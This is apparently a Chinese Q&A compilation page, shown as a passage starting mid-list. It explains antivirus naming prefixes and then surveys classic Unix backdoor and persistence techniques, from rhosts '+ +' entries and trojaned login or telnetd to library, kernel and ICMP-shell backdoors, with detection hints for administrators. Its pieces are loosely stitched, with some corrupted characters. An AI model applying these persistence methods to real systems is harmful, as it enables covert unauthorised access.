木马病毒其前缀是：Trojan，黑客病毒前缀名一般为Hack木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息。而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的，即木马病毒负责侵入用户的电脑，而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马TrojanQQ3344，还有大家可能遇见比较多的针对网络游戏的木马病毒如TrojanLMirPSW60。这里补充一点，病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有**密码的功能（这些字母一般都为“密码”的英文“password”的缩写）一些黑客程序如：网络枭雄（HackNetherClient）等。

4、脚本病毒

脚本病毒的前缀是：脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒，如红色代码（Redlof）。脚本病毒还会有如下前缀：VBS、JS（表明是何种脚本编写的），如欢乐时光（VBSHappytime）、十四日（JsFortnightcs）等。

5、宏病毒

其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。宏病毒的前缀是：Macro，第二前缀是：Word、Word97、Excel、Excel97（也许还有别的）其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀，格式是：MacroWord97；凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀，格式是：MacroWord；凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀，格式是：MacroExcel97；凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀，格式是：MacroExcel，依此类推。该类病毒的公有特性是能感染OFFICE系列文档，然后通过OFFICE通用模板进行传播，如：著名的美丽莎（MacroMelissa）。

6、后门病毒

后门病毒的前缀是：Backdoor该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门BackdoorIRCBot。

7、病毒种植程序病毒

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者（DropperBingHe22C）、MSN射手（DropperWormSmibag）等。

8破坏性程序病毒

破坏性程序病毒的前缀是：Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘（HarmformatCf）、杀手命令（HarmCommandKiller）等。

9玩笑病毒

玩笑病毒的前缀是：Joke也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏 *** 作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼（JokeGirlghost）病毒。

10捆绑机病毒

捆绑机病毒的前缀是：Binder这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ（BinderQQPassQQBin）、系统杀手（Binderkillsys）等。以上为比较常见的病毒前缀，有时候我们还会看到一些其他的，但比较少见，这里简单提一下：

DoS：会针对某台主机或者服务器进行DoS攻击；

Exploit：会自动通过溢出对方或者自己的系统漏洞来传播自身，或者他本身就是一个用于Hacking的溢出工具；

HackTool：黑客工具，也许本身并不破坏你的机子，但是会被别人加以利用来用你做替身去破坏别人。

希望能给你帮助～～～

一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。

密码破解后门

这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。

Rhosts + + 后门

在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"+ +"，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力。许多管理员经常检查 "+ +"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名，从而不易被发现。

校验和及时间戳后门

早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的，MD5使用的算法目前还没人能骗过。

Login后门

在Unix里，login程序通常用来对telnet来的用户进行口令验证。 入侵者获取loginc的原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便用"strings"命令搜索login程序以寻找文本信息。 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效。 所以更多的管理员是用MD5校验和检测这种后门的。

Telnetd后门

当用户telnet到系统，监听端口的inetd服务接受连接随后递给intelnetd，由它运行 login一些入侵者知道管理员会检查login是否被修改，就着手修改intelnetd 在intelnetd内部有一些对用户信息的检验，比如用户使用了何种终端。典型的终端 设置是Xterm或者VT100入侵者可以做这样的后门，当终端设置为"letmein"时产生一个不要任何验证的shell 入侵者已对某些服务作了后门，对来自特定源端口的连接产生一个shell。

服务后门

几乎所有网络服务曾被入侵者作过后门。 Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetdconf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。

Cronjob后门

Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序，同时置入后门。

库后门

几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象cryptc和_cryptc这些函数里作了后门；象loginc这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题： 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。

内核后门

内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态 连接多不能识别。一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。

文件系统后门

入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志，email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，"du"，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞： 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。

Boot块后门

在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。

隐匿进程后门

入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序(sniffer)，有许多办法可以实现，这里是较通用的： 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似insyslog再执行，因此当管理员用"ps"检查运行进程时，出现 的是标准服务名。可以修改库函数致使"ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是

amodtargz :

网络通行。这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问。 因为这是通过非标准网络端口的通行，管理员可能忽视入侵者的足迹。 这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。

TCP Shell 后门

入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门 许多情况下，他们用口令进行保护以免管理员连接上后立即看到是shell访问。 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉。 通常这些后门可以让入侵者躲过TCP Wrapper技术。这些后门可以放在SMTP端口，许多防火墙允许 e-mail通行的

UDP Shell 后门

管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。

ICMP Shell 后门

Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。

加密连接

管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密 后，就不可能被判定两台机器间的传输内容了。

以上就是关于DLL是什么类型的文件有什么作用全部的内容，包括:DLL是什么类型的文件有什么作用、急：怎样杜绝原来的网站制作人员不能进入网站的后台怎样知道网站制作人员在程序编写时留了后门、backdoor.generic.572323这是什么木马有什么危险等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！